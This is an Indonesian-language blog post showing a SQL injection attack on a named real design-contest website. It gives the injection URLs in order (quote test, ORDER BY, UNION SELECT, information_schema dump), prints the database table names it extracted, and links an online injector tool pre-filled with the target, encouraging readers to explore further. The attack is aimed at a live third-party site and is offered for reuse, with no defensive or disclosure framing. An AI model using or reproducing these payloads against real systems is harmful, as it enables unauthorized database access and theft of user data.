oke ini target kita, ni situs hampir mirip kek 99design.com te,pat kontest design, ga sengaja nemu bug sql injectionya.
http://www.designcontents.com/global/php/contents/categori.php?main_idx=2&proidx=4
http://www.designcontents.com/global/php/contents/categori.php?main_idx=2&proidx=4'
http://www.designcontents.com/global/php/contents/categori.php?main_idx=2&proidx=4 order by 1--
http://www.designcontents.com/global/php/contents/categori.php?main_idx=2&proidx=-4 union select 1--
http://www.designcontents.com/global/php/contents/categori.php?main_idx=2&proidx=-4 union select group_concat(table_name) from information_schema.tables where table_schema=database()--
[ global_chat_table ]
[ global_collection ]
[ global_collection_file ]
[ global_collection_sub ]
[ global_contactus ]
[ global_contentsmall ]
[ global_contentsmall_cover ]
[ global_contentsmall_cover_comment ]
[ global_contentsmall_free ]
[ global_cp ]
[ global_cp_application ]
[ global_cpboard ]
[ global_cpfile ]
[ global_custom_made ]
[ global_decrypt ]
[ global_detail_flashurl ]
[ global_detail_image ]
[ global_event_free ]
[ global_event_todaydown ]
[ global_event_todaydown_list ]
[ global_event_txt ]
[ global_faq ]
[ global_freefile_box ]
[ global_freesample ]
[ global_mainmenu ]
[ global_mainmenu_free ]
[ global_mem ]
[ global_newsletter ]
[ global_notice ]
[ global_partner_banner ]
[ global_project ]
[ global_project_free ]
[ global_project_sub ]
[ global_project_sub_free ]
[ global_qna ]
[ global_settle_box ]
[ global_settle_f ]
[ global_settle_t ]
[ global_submenu ]
[ global_submenu_free ]
[ global_wishlist ]
kalo malas kesini aja biar cepat
http://tools.kerinci.net/?x=injector&url=aHR0cDovL3d3dy5kZXNpZ25jb250ZW50cy5jb20vZ2xvYmFsL3BocC9jb250ZW50cy9jYXRl%E2%80%8BZ29yaS5waHA/bWFpbl9pZHg9MiZwcm9pZHg9NA==&spasi=/**/&ending=–&showdb=GLOBAL&unionstring=MXx8bWFpbl9pZHg9Mnx8QU5ELyoqLzE9Mi8qKi9VTklPTi8qKi9BTEwvKiovU0VM%E2%80%8BRUNULyoqLzEs
oke deh selamat explorasi deh, sapa tau aja ada yang asik he..he..he…
Tidak ada komentar:
Posting Komentar